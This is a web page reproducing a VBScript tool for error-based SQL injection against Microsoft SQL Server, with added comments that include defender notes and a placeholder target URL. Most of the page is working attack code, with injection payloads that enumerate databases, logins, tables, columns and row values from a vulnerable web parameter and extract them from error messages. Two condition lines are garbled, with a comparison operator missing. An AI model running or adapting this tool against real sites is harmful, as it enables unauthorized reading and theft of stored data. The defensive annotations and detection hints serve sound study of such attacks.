
Sql2005注射辅助脚本[粗糙版]

Jun 07, 2016 pm 06:04 PM

'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com '亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。

作者:Tr4c3
'为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入

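' Script-level configuration and argument handling.
' The published listing hard-coded a third-party production URL here. A sample
' must not ship with a live host, so the value below is a labelled placeholder:
' set it only to a system you own or are explicitly authorized to test.
Const method = "Get" 'request method; "get" and "post" are the two supported values
Const DisPlay = "D" 'S = append output to result.txt, D = echo to the console

Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD

strUrl_B = "http://REPLACE-WITH-AUTHORIZED-LAB-HOST.example/page.asp?id=1" 'placeholder; must be edited by hand for the lab endpoint under test
i = 1 'starting index used by the database loop
k = 0 'starting offset used by the table, column and value loops
' Split the configured URL at "?" into the path part and the parameter part.
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) 'URL without the query string
strArg = MyArray(1) 'query string (parameter and value)
Set Args = Wscript.Arguments

' With no command-line arguments, print the usage text (ShowU also quits).
If Args.Count = 0 Then
ShowU
End If
'If Args.Count =1 And LCase(Args(0))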

'************************************************************************
' Enumerate database names / report basic connection info
'************************************************************************
' Handles the one-argument modes "databases" and "info".
' Each fragment compares a string-valued expression with 0; SqlInj then looks
' for text between '[ and ]' in the HTTP response, i.e. the technique depends
' on the application returning the database's error text to the client.
' Defender notes: parameterized queries remove the injection point, and generic
' error pages remove the channel this script reads from. The literal tokens
' quotename(, db_name( and System_user in request parameters are usable as
' log/WAF signatures for this script.
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
ResuT("---------------===============================--------------")
ResuT("All The DataBases:")

' Asks for db_name(i) with i increasing from its initial value until SqlInj
' leaves strD empty (no bracketed value found in the response).
Do
strData = " and quotename(db_name("&i&"))=0--"
sqlInj(strData)
i = i + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
' Three single requests: current database, database user, system login.
ResuT("---------------===============================--------------")
ResuT("The Current Database is:")
strData = " and quotename(db_name())=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The database User is:")
strData = " and quotename(user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The System_user is:")
strData = " and quotename(System_user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
Wscript.Quit
End If
End If
'************************************************************************
' Enumerate table names
'************************************************************************
' Two-argument mode: <database> tables.
' Reads names from <database>.dbo.sysobjects where xtype=char(85) (char(85) is
' "U"; the usage text describes these as user tables), one name per request,
' skipping the first k names each time. Stops when SqlInj leaves strD empty.
' Defender notes: the web application's database login should not be able to
' read catalog tables of other databases (least privilege); references to
' sysobjects in request parameters are a strong detection signal.
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
' Enumerate column names
'************************************************************************
' Three-argument mode: <database> <table> cols.
' Reads names from <database>.DBO.SYSCOLUMNS filtered by object_id of
' <database>.dbo.<table>, one name per request, skipping the first k names.
' Stops when SqlInj leaves strD empty.
' Defender note: syscolumns / object_id( appearing in request parameters is a
' usable log signature for this stage.
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
' Enumerate column values
'************************************************************************
' Four-argument mode: <database> <table> <column> values.
' Requests one value of the column per HTTP request, skipping the first k
' values each time, and stops when SqlInj leaves strD empty.
' Defender note: this stage produces one request per row with a steadily
' increasing "select top N" number, so a burst of near-identical requests
' that each yield a database error is the pattern to alert on.
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

' Sends one HTTP request carrying strArg followed by the supplied fragment and
' stores the text found between '[ and ]' in the response in the script-level
' variable strD (empty string when no such text is found). The extracted text
' is also written out through ResuT.
'   value - fragment appended to the configured parameter string.
' The request is synchronous (third argument of Open is False) and sets the
' Referer header to the target URL.
' NOTE(review): the two "If InStr(...)0 And InStr(...)0 Then" lines are not
' valid VBScript as shown; a comparison operator appears to have been lost when
' the page was extracted.
' Defender note: the sub only yields data when the response body contains the
' bracketed value, so returning a generic error page instead of the database's
' message defeats the extraction even where an injection flaw remains; the flaw
' itself is fixed with parameterized queries.
Sub SqlInj(value)
If UCase(method) = "GET" Then
' GET: the parameter string plus fragment goes into the query string as-is.
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", strUrl &"?" & value , False
objXML.SetRequestHeader "Referer", strUrl
'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
objXML.send()
strRevS = objXML.ResponseText 'used by default
'strRevS = bytes2BSTR(objXML.ResponseBody) 'sometimes needed for Korean text
If InStr(strRevS,"'[")0 And InStr(strRevs,"]'")0 Then
' Take the text between the opening '[ and the closing ]' markers.
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
ElseIf UCase(method) = "POST" Then
' POST: same payload, sent as a form body after UrlEncode (spaces become "+").
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST", strUrl, False
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "Referer", strUrl
objXML.send(UrlEncode(value))
strRevS = objXML.ResponseText 'used by default
'strRevS = bytes2BSTR(objXML.ResponseBody) 'sometimes needed for Korean text
If InStr(strRevS,"'[")0 And InStr(strRevs,"]'")0 Then
' Take the text between the opening '[ and the closing ]' markers.
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
End If
End Sub

' Emits one line of output according to the DisPlay constant:
'   "S" - append the line to result.txt in the current directory
'   "D" - echo the line to the console
' Any other DisPlay value produces no output. The function returns nothing.
Function ResuT(strInfo)
    Dim fso, fso1
    Select Case UCase(DisPlay)
        Case "S"
            Set fso = CreateObject("Scripting.FileSystemObject")
            ' 8 = open for appending; True = create the file if it is missing
            Set fso1 = fso.OpenTextFile("result.txt", 8, True)
            fso1.WriteLine(strInfo)
            fso1.Close
            Set fso = Nothing
        Case "D"
            Wscript.Echo(strInfo)
    End Select
End Function

' Replaces every space in str with "+" and returns the result.
' No other character is encoded. The argument is also overwritten with the
' result, exactly as in the original (VBScript passes it by reference).
Function UrlEncode(str)
    Dim encoded
    encoded = Replace(str, " ", "+")
    str = encoded
    UrlEncode = encoded
End Function

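' Converts a byte sequence (for example an XMLHTTP ResponseBody) into a
' VBScript string. Bytes below &H80 are taken as single-byte characters; any
' other byte is treated as the lead byte of a two-byte character and combined
' with the byte that follows it.
'   vIn - byte data readable with LenB/MidB.
' Returns the decoded string.
' Changes from the published listing:
'   - the "If ThisCharCode ..." line had lost its comparison ("< &H80 Then"),
'     which made the function a syntax error;
'   - the loop used the script-level variable i as its index and so overwrote
'     the caller's counter; a local index is used instead;
'   - a lead byte in the last position no longer reads past the end of the
'     data (the dangling byte is dropped).
Function bytes2BSTR(vIn)
    Dim strReturn, idx, total, ThisCharCode, NextCharCode
    strReturn = ""
    total = LenB(vIn)
    idx = 1
    Do While idx <= total
        ThisCharCode = AscB(MidB(vIn, idx, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        ElseIf idx < total Then
            NextCharCode = AscB(MidB(vIn, idx + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            idx = idx + 1 ' the trail byte has been consumed as well
        End If
        idx = idx + 1
    Loop
    bytes2BSTR = strReturn
End Function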

' Prints the banner and the five supported command-line forms, then ends the
' script. Called when the script is started without arguments.
Sub showU()
    Dim rule, cmd
    rule = "+--------------------------=====================------------------------------+"
    ' Every usage line starts with the same prefix built from the script's file name.
    cmd = " cscript" & Wscript.ScriptName
    Wscript.Echo(rule)
    Wscript.Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com")
    Wscript.Echo("Usage:")
    Wscript.Echo(cmd & " info--爆基本信息")
    Wscript.Echo(cmd & " databases--爆所有库名")
    Wscript.Echo(cmd & " pubs tables--爆库pubs里所有用户表名")
    Wscript.Echo(cmd & " pubs authors cols--爆库pubs里authors表的所有字段名")
    Wscript.Echo(cmd & " pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
    Wscript.Echo(rule)
    Wscript.Quit
End Sub